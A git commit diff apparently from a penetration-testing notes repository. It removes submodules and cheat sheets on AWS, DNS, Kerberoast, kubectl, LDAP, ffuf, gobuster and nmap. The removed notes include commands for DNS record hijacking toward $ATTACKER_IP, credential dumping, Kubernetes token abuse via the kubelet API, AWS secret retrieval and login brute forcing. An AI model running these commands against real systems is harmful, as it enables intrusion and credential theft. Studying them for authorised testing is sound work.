removed enumeration dir
This commit is contained in:
parent
628cfd0a67
commit
e1b1a5e9cd
|
@ -1,18 +1,3 @@
|
||||||
[submodule "enumeration/Sublist3r"]
|
|
||||||
path = enumeration/Sublist3r
|
|
||||||
url = https://github.com/aboul3la/Sublist3r.git
|
|
||||||
[submodule "enumeration/gobuster"]
|
|
||||||
path = enumeration/gobuster
|
|
||||||
url = https://github.com/OJ/gobuster.git
|
|
||||||
[submodule "enumeration/Checklists"]
|
|
||||||
path = enumeration/Checklists
|
|
||||||
url = https://github.com/netbiosX/Checklists.git
|
|
||||||
[submodule "enumeration/kerbrute"]
|
|
||||||
path = enumeration/kerbrute
|
|
||||||
url = https://github.com/ropnop/kerbrute.git
|
|
||||||
[submodule "enumeration/windows/Windows-Exploit-Suggester"]
|
|
||||||
path = enumeration/windows/Windows-Exploit-Suggester
|
|
||||||
url = https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
|
|
||||||
[submodule "PayloadsAllTheThings"]
|
[submodule "PayloadsAllTheThings"]
|
||||||
path = PayloadsAllTheThings
|
path = PayloadsAllTheThings
|
||||||
url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
|
url = https://github.com/swisskyrepo/PayloadsAllTheThings.git
|
||||||
|
@ -34,12 +19,6 @@
|
||||||
[submodule "enumeration/enumeration"]
|
[submodule "enumeration/enumeration"]
|
||||||
path = enumeration/enumeration
|
path = enumeration/enumeration
|
||||||
url = https://github.com/digininja/CeWL.git
|
url = https://github.com/digininja/CeWL.git
|
||||||
[submodule "enumeration/CeWL"]
|
|
||||||
path = enumeration/CeWL
|
|
||||||
url = https://github.com/digininja/CeWL.git
|
|
||||||
[submodule "enumeration/RustScan"]
|
|
||||||
path = enumeration/RustScan
|
|
||||||
url = https://github.com/RustScan/RustScan.git
|
|
||||||
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
|
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
|
||||||
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
|
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
|
||||||
url = https://github.com/mzet-/linux-exploit-suggester
|
url = https://github.com/mzet-/linux-exploit-suggester
|
||||||
|
@ -97,12 +76,6 @@
|
||||||
[submodule "exploit/windows/PrintNightmare"]
|
[submodule "exploit/windows/PrintNightmare"]
|
||||||
path = exploit/windows/PrintNightmare
|
path = exploit/windows/PrintNightmare
|
||||||
url = https://github.com/ly4k/PrintNightmare.git
|
url = https://github.com/ly4k/PrintNightmare.git
|
||||||
[submodule "enumeration/containers/deepce"]
|
|
||||||
path = enumeration/containers/deepce
|
|
||||||
url = https://github.com/stealthcopter/deepce.git
|
|
||||||
[submodule "enumeration/Typo3Scan"]
|
|
||||||
path = enumeration/Typo3Scan
|
|
||||||
url = https://github.com/whoot/Typo3Scan.git
|
|
||||||
[submodule "exploit/web/php/phpggc"]
|
[submodule "exploit/web/php/phpggc"]
|
||||||
path = exploit/web/php/phpggc
|
path = exploit/web/php/phpggc
|
||||||
url = https://github.com/ambionics/phpggc.git
|
url = https://github.com/ambionics/phpggc.git
|
||||||
|
@ -127,9 +100,6 @@
|
||||||
[submodule "post_exploitation/powershell"]
|
[submodule "post_exploitation/powershell"]
|
||||||
path = post_exploitation/powershell
|
path = post_exploitation/powershell
|
||||||
url = https://github.com/puckiestyle/powershell.git
|
url = https://github.com/puckiestyle/powershell.git
|
||||||
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
|
|
||||||
path = enumeration/network_scanners/kotlin-port-scanner
|
|
||||||
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
|
|
||||||
[submodule "exploit/macOS/ds_store_exp"]
|
[submodule "exploit/macOS/ds_store_exp"]
|
||||||
path = exploit/macOS/ds_store_exp
|
path = exploit/macOS/ds_store_exp
|
||||||
url = https://github.com/lijiejie/ds_store_exp.git
|
url = https://github.com/lijiejie/ds_store_exp.git
|
||||||
|
@ -148,9 +118,6 @@
|
||||||
[submodule "exploit/padding/PadBuster"]
|
[submodule "exploit/padding/PadBuster"]
|
||||||
path = exploit/padding/PadBuster
|
path = exploit/padding/PadBuster
|
||||||
url = https://github.com/AonCyberLabs/PadBuster.git
|
url = https://github.com/AonCyberLabs/PadBuster.git
|
||||||
[submodule "enumeration/Subrake"]
|
|
||||||
path = enumeration/Subrake
|
|
||||||
url = https://github.com/hash3liZer/Subrake.git
|
|
||||||
[submodule "post_exploitation/bc_security/Empire"]
|
[submodule "post_exploitation/bc_security/Empire"]
|
||||||
path = post_exploitation/bc_security/Empire
|
path = post_exploitation/bc_security/Empire
|
||||||
url = https://github.com/BC-SECURITY/Empire.git
|
url = https://github.com/BC-SECURITY/Empire.git
|
||||||
|
@ -160,9 +127,6 @@
|
||||||
[submodule "misc/bruteforce/patator"]
|
[submodule "misc/bruteforce/patator"]
|
||||||
path = misc/bruteforce/patator
|
path = misc/bruteforce/patator
|
||||||
url = https://github.com/lanjelot/patator.git
|
url = https://github.com/lanjelot/patator.git
|
||||||
[submodule "enumeration/enum4linux"]
|
|
||||||
path = enumeration/enum4linux
|
|
||||||
url = https://github.com/CiscoCXSecurity/enum4linux.git
|
|
||||||
[submodule "exploit/samba/smbmap"]
|
[submodule "exploit/samba/smbmap"]
|
||||||
path = exploit/samba/smbmap
|
path = exploit/samba/smbmap
|
||||||
url = https://github.com/ShawnDEvans/smbmap.git
|
url = https://github.com/ShawnDEvans/smbmap.git
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60
|
|
Binary file not shown.
|
@ -1 +0,0 @@
|
||||||
Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 729d649ec5370730172bf6f5314aafd68c874124
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 08b2a2509c934d5d9c6256c7dbe14ef26f6ddb6c
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 9ee2b90114121ecd95ffc943a81aa1d01c054a2f
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 060506279e6a0a5127da7245e9dac58c76d64fb4
|
|
|
@ -1,84 +0,0 @@
|
||||||
# AWS S3 Enumeration
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
|
|
||||||
* `--region`
|
|
||||||
### Simple Storage Service (S3)
|
|
||||||
* [S3](https://aws.amazon.com/s3/)
|
|
||||||
* Methods of access control are as follows
|
|
||||||
* [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
|
|
||||||
* [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)
|
|
||||||
|
|
||||||
* Scheme is
|
|
||||||
```sh
|
|
||||||
http://<bucketname>.s3.amazonaws.com/file.name
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```sh
|
|
||||||
http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
|
|
||||||
```
|
|
||||||
|
|
||||||
* __List content of public bucket via__
|
|
||||||
```sh
|
|
||||||
aws s3 ls s3://<bucketname>/ --no-sign-request
|
|
||||||
```
|
|
||||||
* Download via `curl`, `wget` or `s3` cli via
|
|
||||||
```sh
|
|
||||||
aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
|
|
||||||
```
|
|
||||||
|
|
||||||
#### ACL
|
|
||||||
* `Anyone`, just `curl`
|
|
||||||
* `AuthenticatedUsers`, `s3` cli with aws key
|
|
||||||
|
|
||||||
## IAM
|
|
||||||
* Not necessarily used by s3
|
|
||||||
* Access key ID, starts with `AKIA` + 20 chars
|
|
||||||
* Secret access key
|
|
||||||
* Session token, `ASIA` + sessionToken
|
|
||||||
|
|
||||||
* Add credentials to profile via
|
|
||||||
```sh
|
|
||||||
aws configure --profile PROFILENAME
|
|
||||||
```
|
|
||||||
* Config and credentials is stored at `~/.aws`
|
|
||||||
* Sanity test profile via
|
|
||||||
```sh
|
|
||||||
aws s3 ls --profile PROFILENAME
|
|
||||||
```
|
|
||||||
* Find account ID to an access key
|
|
||||||
```sh
|
|
||||||
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
|
|
||||||
```
|
|
||||||
* Find username to an access key
|
|
||||||
```sh
|
|
||||||
aws sts get-caller-identity --profile PROFILENAME
|
|
||||||
```
|
|
||||||
* Listing EC2 instances of an account
|
|
||||||
```sh
|
|
||||||
aws ec2 describe-instances --output text --profile PROFILENAME
|
|
||||||
```
|
|
||||||
* aws ec2 describe-instances --output text --profile PROFILENAME
|
|
||||||
```sh
|
|
||||||
aws ec2 describe-instances --output text --profile PROFILENAME
|
|
||||||
```
|
|
||||||
* In another region
|
|
||||||
```sh
|
|
||||||
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
|
|
||||||
```
|
|
||||||
|
|
||||||
### AWS ARN
|
|
||||||
* Unique ID is create via the following scheme
|
|
||||||
```sh
|
|
||||||
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Secrets
|
|
||||||
|
|
||||||
```sh
|
|
||||||
aws secretsmanager help
|
|
||||||
aws secretsmanager list-secrets
|
|
||||||
ws secretsmanager get-secret-value --secret-id <Name> --region <region>
|
|
||||||
```
|
|
||||||
|
|
|
@ -1,4 +0,0 @@
|
||||||
# Cewl
|
|
||||||
|
|
||||||
* Wordlist generator from website
|
|
||||||
* [CeWl repo](https://github.com/digininja/CeWL.git)
|
|
|
@ -1,25 +0,0 @@
|
||||||
# DNS
|
|
||||||
|
|
||||||
## Subdomain Enumeration
|
|
||||||
|
|
||||||
* Get all the info via
|
|
||||||
```sh
|
|
||||||
dig @$TARGET_DNS $DOMAIN axfr
|
|
||||||
drill @$TARGET_DNS $DOMAIN axfr
|
|
||||||
```
|
|
||||||
|
|
||||||
* [subrake](https://github.com/hash3liZer/Subrake.git)
|
|
||||||
|
|
||||||
|
|
||||||
## Join a Domain
|
|
||||||
|
|
||||||
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
|
|
||||||
```sh
|
|
||||||
nsupdate
|
|
||||||
server <DNS-IP>
|
|
||||||
update delete <sub.domain.com>
|
|
||||||
update add <sub.domain.com> 1234 A $ATTACKER_IP
|
|
||||||
send
|
|
||||||
quit
|
|
||||||
```
|
|
||||||
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
|
|
@ -1,21 +0,0 @@
|
||||||
# Docker Enumeration
|
|
||||||
|
|
||||||
## Save Images
|
|
||||||
|
|
||||||
* Save image and extract it
|
|
||||||
```sh
|
|
||||||
docker save -o image.tar <image-name>
|
|
||||||
tar -xf image.tar
|
|
||||||
```
|
|
||||||
* Run a container from the image and `printenv`
|
|
||||||
|
|
||||||
### Manifest
|
|
||||||
* Read the manifest inside the image extracted
|
|
||||||
```sh
|
|
||||||
jq . manifest.json
|
|
||||||
```
|
|
||||||
* Read the config JSON file mentioned in the manifest
|
|
||||||
* Inside this config file there are the shell commands used at building the image
|
|
||||||
* Snoop around after interesting files, especially inside the root dir in `layer.tar`
|
|
||||||
|
|
||||||
|
|
|
@ -1,53 +0,0 @@
|
||||||
# Fuzz Faster U Fool
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
```sh
|
|
||||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
|
|
||||||
```
|
|
||||||
* Fuzz dirs
|
|
||||||
```sh
|
|
||||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
|
|
||||||
```
|
|
||||||
* Fuzz files
|
|
||||||
```sh
|
|
||||||
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
### Fuzz parameters
|
|
||||||
```sh
|
|
||||||
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
|
|
||||||
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
|
|
||||||
```
|
|
||||||
* Fuzz values
|
|
||||||
```sh
|
|
||||||
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
|
|
||||||
```
|
|
||||||
* Fuzz Post Methods
|
|
||||||
```sh
|
|
||||||
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
|
|
||||||
```
|
|
||||||
### Fuzz Users and use Bruteforce
|
|
||||||
* Fuzz users and write file
|
|
||||||
```sh
|
|
||||||
ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/signup -mr "username already exists" -o fuff.out
|
|
||||||
```
|
|
||||||
* Use users saved in `fuff.out` to bruteforce
|
|
||||||
```sh
|
|
||||||
ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/login -fc 200
|
|
||||||
```
|
|
||||||
### Fuzz Subdomains
|
|
||||||
```sh
|
|
||||||
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
|
|
||||||
```
|
|
||||||
or if the subdomains are listed in the target's host file
|
|
||||||
```sh
|
|
||||||
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http://<target-IP> -fs 0
|
|
||||||
```
|
|
||||||
* Fuzz Vhosts & Server Blocks
|
|
||||||
```sh
|
|
||||||
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
|
|
||||||
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
|
|
||||||
```
|
|
||||||
|
|
||||||
### Proxy
|
|
||||||
* `-replay-proxy <IP>` or `-x <ProxyIP>`
|
|
|
@ -1,48 +0,0 @@
|
||||||
# Gobuster
|
|
||||||
|
|
||||||
[Repo](https://github.com/OJ/gobuster.git)
|
|
||||||
|
|
||||||
### Directories
|
|
||||||
```sh
|
|
||||||
gobuster dir -u <URL> -w <wordlist>
|
|
||||||
```
|
|
||||||
|
|
||||||
### DNS
|
|
||||||
```sh
|
|
||||||
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Vhosts
|
|
||||||
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
|
|
||||||
```sh
|
|
||||||
gobuster vhost -u <URL> -w <wordlist>
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### FileExtension
|
|
||||||
```sh
|
|
||||||
-x
|
|
||||||
```
|
|
||||||
* Fuzz for files and file extensions
|
|
||||||
```sh
|
|
||||||
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
|
|
||||||
```
|
|
||||||
|
|
||||||
### Basic Auth
|
|
||||||
```sh
|
|
||||||
gobuster help dir
|
|
||||||
```
|
|
||||||
* `--username` and `--password`
|
|
||||||
|
|
||||||
* `dir -s` Accept HTTP Status
|
|
||||||
* `dir -k` Skip TLS Auth
|
|
||||||
* `dir -a` User Agent
|
|
||||||
|
|
||||||
### Wordlists
|
|
||||||
```sh
|
|
||||||
/usr/share/seclists/Discovery/Web-Content/common.txt
|
|
||||||
/usr/share/seclists/Discovery/Web-Content/big.txt
|
|
||||||
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
|
|
||||||
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
|
|
||||||
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
|
|
||||||
```
|
|
|
@ -1,55 +0,0 @@
|
||||||
# Kerberoast
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
### List users
|
|
||||||
|
|
||||||
```sh
|
|
||||||
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
|
|
||||||
```
|
|
||||||
|
|
||||||
### Get Users
|
|
||||||
* Impacket's `GetNPUsers.py` to get Hashes of userlist
|
|
||||||
```sh
|
|
||||||
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
|
|
||||||
```
|
|
||||||
|
|
||||||
### Find SPNs
|
|
||||||
|
|
||||||
```sh
|
|
||||||
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```sh
|
|
||||||
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Further Intel
|
|
||||||
|
|
||||||
```sh
|
|
||||||
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
|
|
||||||
```
|
|
||||||
|
|
||||||
### Check Found Users
|
|
||||||
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
|
|
||||||
```sh
|
|
||||||
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
|
|
||||||
```
|
|
||||||
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
|
|
||||||
* Change password with
|
|
||||||
```sh
|
|
||||||
smbpasswd.py <user>@$TARGET_IP -newpass password123
|
|
||||||
```
|
|
||||||
|
|
||||||
### Impersonate
|
|
||||||
|
|
||||||
```sh
|
|
||||||
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
|
|
||||||
```
|
|
||||||
* Serviceticket is save as `Administrator.ccache`
|
|
||||||
* `export KRB5CCNAME=Administrator.ccache`
|
|
||||||
* After that dump secrets
|
|
||||||
```sh
|
|
||||||
secretsdump.py -k -no-pass <DOMAIN>
|
|
||||||
```
|
|
||||||
|
|
|
@ -1,81 +0,0 @@
|
||||||
# Kubectl
|
|
||||||
|
|
||||||
* Get pods, `-A` for all namespaces
|
|
||||||
```sh
|
|
||||||
kubectl get pods -A
|
|
||||||
```
|
|
||||||
* Check mounted secret
|
|
||||||
```sh
|
|
||||||
kubectl auth can-i --list
|
|
||||||
kubectl get secrets
|
|
||||||
kubectl get nodes
|
|
||||||
kubectl get deployments
|
|
||||||
kubectl get services
|
|
||||||
kubectl get ingress
|
|
||||||
kubectl get jobs
|
|
||||||
```
|
|
||||||
* Intel about a secret, and output
|
|
||||||
```sh
|
|
||||||
kubectl describe secrets <secret>
|
|
||||||
kubectl get secret <secret> -o json
|
|
||||||
kubectl describe secrets <secret> -o 'json'
|
|
||||||
```
|
|
||||||
## Abuse Token
|
|
||||||
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
|
||||||
* By change of an LFI extract the token and
|
|
||||||
```sh
|
|
||||||
kubectl auth can-i --list --token=$TOKEN
|
|
||||||
kubectl get pods --token=$TOKEN
|
|
||||||
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
|
|
||||||
```
|
|
||||||
|
|
||||||
* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
|
|
||||||
```
|
|
||||||
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Elevate Permissions with found token
|
|
||||||
|
|
||||||
* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
|
|
||||||
```sh
|
|
||||||
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
|
|
||||||
```
|
|
||||||
* Find namespace and pods
|
|
||||||
```sh
|
|
||||||
kubectl get pods -A
|
|
||||||
```
|
|
||||||
* Find name of container inside the pod description under `ContainerStatuses/name`
|
|
||||||
```sh
|
|
||||||
kubectl get pod $POD -n $NAMESPACE -o yaml
|
|
||||||
```
|
|
||||||
|
|
||||||
* Interesting find in any high priv container are
|
|
||||||
```sh
|
|
||||||
/run/secrets/kubernetes.io/serviceaccount/token
|
|
||||||
/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
|
||||||
```
|
|
||||||
|
|
||||||
* Enumerate again with the new found token
|
|
||||||
```sh
|
|
||||||
kubectl auth can-i --list
|
|
||||||
```
|
|
||||||
|
|
||||||
## Create Pods
|
|
||||||
|
|
||||||
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
|
|
||||||
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
|
|
||||||
```sh
|
|
||||||
kubectl apply -f pod.yml --token=$TOKEN
|
|
||||||
```
|
|
||||||
* Start Pod
|
|
||||||
```sh
|
|
||||||
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
|
|
||||||
```
|
|
||||||
|
|
||||||
## Start Pods
|
|
||||||
|
|
||||||
```sh
|
|
||||||
kubectl exec -it <podname> -n <namespace> -- /bin/bash
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
|
@ -1,23 +0,0 @@
|
||||||
# LDAP
|
|
||||||
|
|
||||||
## Get Domain
|
|
||||||
|
|
||||||
```sh
|
|
||||||
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
|
|
||||||
```
|
|
||||||
* Use found namingcontexts DC
|
|
||||||
```sh
|
|
||||||
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>
|
|
||||||
```
|
|
||||||
* Authenticated LDAP Search
|
|
||||||
```sh
|
|
||||||
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > outfile
|
|
||||||
```
|
|
||||||
|
|
||||||
## Domain Dump
|
|
||||||
|
|
||||||
* If a set of credentials are known via
|
|
||||||
```sh
|
|
||||||
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
|
|
||||||
```
|
|
||||||
* Take a look at the genreated HTML files
|
|
|
@ -1,37 +0,0 @@
|
||||||
# Linux Basic Enumeration
|
|
||||||
```sh
|
|
||||||
less ~/.bash_history
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
cat /etc/*-release
|
|
||||||
cat /proc/version
|
|
||||||
uname -a
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
sudo -V
|
|
||||||
sudo -L
|
|
||||||
```
|
|
||||||
* Check if is writeable
|
|
||||||
```sh
|
|
||||||
vim /etc/passwd
|
|
||||||
vim /etc/hosts
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
crontab -l
|
|
||||||
```
|
|
||||||
|
|
||||||
* Find interesting files
|
|
||||||
```sh
|
|
||||||
find / -perm /6000 2>/dev/null
|
|
||||||
find / -perm -u=s -type f 2>/dev/null
|
|
||||||
find / -type f -name "*.log" 2>/dev/null
|
|
||||||
find / -type f -name "*.bak" 2>/dev/null
|
|
||||||
find / -type f -name "*.conf" 2>/dev/null
|
|
||||||
```
|
|
||||||
|
|
||||||
* Open Sockets
|
|
||||||
```sh
|
|
||||||
lsof -i
|
|
||||||
netstat -natup
|
|
||||||
ss -natup
|
|
||||||
```
|
|
|
@ -1,13 +0,0 @@
|
||||||
# Microk8s
|
|
||||||
|
|
||||||
* [microk8s repo](https://github.com/ubuntu/microk8s)
|
|
||||||
|
|
||||||
## Enumeration
|
|
||||||
|
|
||||||
```sh
|
|
||||||
microk8s kubectl get nodes
|
|
||||||
microk8s kubectl get services
|
|
||||||
microk8s kubectl get pods
|
|
||||||
microk8s kubectl get deployments -o wide
|
|
||||||
microk8s kubectl cluster-info
|
|
||||||
```
|
|
|
@ -1,4 +0,0 @@
|
||||||
# NFS Enumeration
|
|
||||||
|
|
||||||
* `rpcinfo -p $TARGET_IP`
|
|
||||||
* `showmount -e $TARGET_IP`
|
|
|
@ -1,32 +0,0 @@
|
||||||
# Nikto
|
|
||||||
Scan web server vulnerabilities and more.
|
|
||||||
|
|
||||||
## mmap Input
|
|
||||||
* Pipe or pre run nmap
|
|
||||||
```sh
|
|
||||||
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
|
|
||||||
```
|
|
||||||
|
|
||||||
# Usage
|
|
||||||
|
|
||||||
* Example
|
|
||||||
```
|
|
||||||
nikto -h http://example.com i -p 80,8080
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
nikto -id <user>:<password> -h http://example.com:1234/manager/html
|
|
||||||
```
|
|
||||||
## Plugins
|
|
||||||
```sh
|
|
||||||
nikto -h http://example.com -Plugins apacheusers
|
|
||||||
```
|
|
||||||
|
|
||||||
* List all plugins
|
|
||||||
```sh
|
|
||||||
nikto -list-plugins
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
|
@ -1,127 +0,0 @@
|
||||||
# nmap
|
|
||||||
|
|
||||||
## Scan Types
|
|
||||||
* ARP
|
|
||||||
* ICMP
|
|
||||||
* TCP
|
|
||||||
* UDP
|
|
||||||
|
|
||||||
## Port States
|
|
||||||
1. Open
|
|
||||||
2. Closed
|
|
||||||
3. Filtered
|
|
||||||
4. Unfiltered
|
|
||||||
5. Open|Filtered
|
|
||||||
6. Close|Filtered
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
```sh
|
|
||||||
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
|
|
||||||
```
|
|
||||||
|
|
||||||
### combo with searchsploit
|
|
||||||
* nmap-full scan
|
|
||||||
```sh
|
|
||||||
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
|
|
||||||
searchsploit --nmap ./nmap-full.xml --verbose
|
|
||||||
```
|
|
||||||
### Wordpress Enumeration
|
|
||||||
```sh
|
|
||||||
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
|
|
||||||
```
|
|
||||||
|
|
||||||
### Use List of Hosts
|
|
||||||
```sh
|
|
||||||
nmap -iL <ListofHosts>
|
|
||||||
```
|
|
||||||
* Show hosts, dns resolution included
|
|
||||||
```sh
|
|
||||||
nmap -sL -n 10.10.0.0/16
|
|
||||||
```
|
|
||||||
|
|
||||||
### ARP Scan Local Network
|
|
||||||
```sh
|
|
||||||
nmap -PR -sn 192.168.0.0/24
|
|
||||||
```
|
|
||||||
### ICMP Scans
|
|
||||||
* __Type 8__ (Ping Request)
|
|
||||||
```sh
|
|
||||||
nmap -PE -sn 10.10.0.0/16
|
|
||||||
```
|
|
||||||
* __Type 13__ (Timestamp Request)
|
|
||||||
```sh
|
|
||||||
nmap -PP -sn 10.10.0.0/16
|
|
||||||
```
|
|
||||||
* __Type 17__ (Address Mask Queries)
|
|
||||||
```sh
|
|
||||||
nmap -PM -sn 10.10.0.0/16
|
|
||||||
```
|
|
||||||
|
|
||||||
### TCP Scans
|
|
||||||
* `-PS23` Syn on port 23
|
|
||||||
* `-PA80-8080` ACK on port range 80-8080
|
|
||||||
|
|
||||||
#### TCP Scan Types
|
|
||||||
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
|
|
||||||
* __FIN Scan__ `-sF` , same procedure as null scan.
|
|
||||||
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
|
|
||||||
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
|
|
||||||
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
|
|
||||||
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
|
|
||||||
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
|
|
||||||
|
|
||||||
### UDP SCans
|
|
||||||
* `-PU`
|
|
||||||
* May be answered by ICMP Type 3 if the port is not reachable
|
|
||||||
|
|
||||||
### DNS Scan
|
|
||||||
* No lookup `-n`
|
|
||||||
* Reverse lookup for every host `-R`
|
|
||||||
* Host discovery only `-sn`
|
|
||||||
|
|
||||||
### Spoofing
|
|
||||||
* IP `-S <spoofed-IP>`
|
|
||||||
* MAC `--spoof-mac <spoofed-MAC>`
|
|
||||||
* Disable ping scan `-Pn`
|
|
||||||
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
|
|
||||||
|
|
||||||
### Service Detection
|
|
||||||
* `-sV`
|
|
||||||
* `--version-intensity <level 0-9>`
|
|
||||||
* Intensity 2 `--version-light`
|
|
